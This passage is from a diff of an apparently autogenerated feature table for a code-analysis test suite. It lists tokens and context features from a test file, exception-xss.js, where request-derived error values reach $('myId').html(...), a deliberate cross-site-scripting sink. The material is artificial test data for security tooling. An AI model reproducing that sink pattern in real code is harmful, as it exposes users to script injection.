| 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:5:130:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:5:130:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19177,6 +129786,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:130:5:130:10 | 'myId' | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:5:130:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:5:130:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:13:130:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:13:130:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:13:130:16 | html | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:13:130:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:130:13:130:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:18:130:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:18:130:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:18:130:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19184,6 +129798,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:130:18:130:18 | e | enclosingFunctionBody | sessionStorage setItem exceptionSession document location search unknown sessionStorage getItem exceptionSession e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:18:130:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:130:18:130:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:135:3 | app | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:135:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:135:3 | app | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:135:7 | app.get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:135:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:135:7 | app.get | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:143:2 | app.get ... \\t});\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:143:2 | app.get ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:143:2 | app.get ... \\t});\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:143:2 | exceptional return of app.get ... \\t});\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:143:2 | exceptional return of app.get ... \\t});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:1:143:2 | exceptional return of app.get ... \\t});\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:5:135:7 | get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:5:135:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:5:135:7 | get | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:9:135:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:9:135:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:9:135:19 | '/user/:id' | calleeImports | express | @@ -19191,6 +129820,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:135:9:135:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:9:135:19 | '/user/:id' | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:9:135:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:135:21 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:135:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:135:21 | this | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:135:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:135:21 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | exceptional return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | exceptional return of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | functio ... \\n\\t});\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | functio ... \\n\\t});\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | functio ... \\n\\t});\\n} | calleeImports | express | @@ -19198,6 +129842,51 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | functio ... \\n\\t});\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | functio ... \\n\\t});\\n} | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | functio ... \\n\\t});\\n} | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:22:143:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:32:135:34 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:37:135:39 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:37:135:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:37:135:39 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:37:135:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:135:37:135:39 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:136:8 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:136:8 | unknown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:136:8 | unknown | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:136:8 | unknown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:136:8 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | exceptional return of unknown ... w?)\\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | exceptional return of unknown ... w?)\\n\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | exceptional return of unknown ... w?)\\n\\t}) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | exceptional return of unknown ... w?)\\n\\t}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | exceptional return of unknown ... w?)\\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | unknown ... w?)\\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | unknown ... w?)\\n\\t}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | unknown ... w?)\\n\\t}) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | unknown ... w?)\\n\\t}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:2:142:3 | unknown ... w?)\\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:12 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:12 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:12 | req | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:12 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:12 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:19 | req.params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:19 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:19 | req.params | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:19 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:19 | req.params | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:22 | req.params.id | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:22 | req.params.id | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:22 | req.params.id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19205,6 +129894,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:22 | req.params.id | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:22 | req.params.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:10:136:22 | req.params.id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:14:136:19 | params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:14:136:19 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:14:136:19 | params | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:14:136:19 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:14:136:19 | params | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:21:136:22 | id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:21:136:22 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:21:136:22 | id | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:21:136:22 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:21:136:22 | id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | 'arguments' object of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | 'arguments' object of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | (error, ... ow?)\\n\\t} | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | (error, ... ow?)\\n\\t} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | (error, ... ow?)\\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19212,6 +129916,76 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | (error, ... ow?)\\n\\t} | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | (error, ... ow?)\\n\\t} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | (error, ... ow?)\\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | exceptional return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:25:142:2 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:26:136:30 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:136:33:136:35 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:137:7:137:11 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:4 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:4 | $ | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:4 | $ | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:4 | $ | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:4 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | $('myId') | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | exceptional return of $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | exceptional return of $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:12 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:17 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:17 | $('myId').html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:17 | $('myId').html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:17 | $('myId').html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:17 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | $('myId ... (error) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | $('myId ... (error) | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | $('myId ... (error) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | $('myId ... (error) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | $('myId ... (error) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | exceptional return of $('myId ... (error) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | exceptional return of $('myId ... (error) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | exceptional return of $('myId ... (error) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | exceptional return of $('myId ... (error) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:138:4:138:24 | exceptional return of $('myId ... (error) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:6:138:11 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:6:138:11 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:138:6:138:11 | 'myId' | 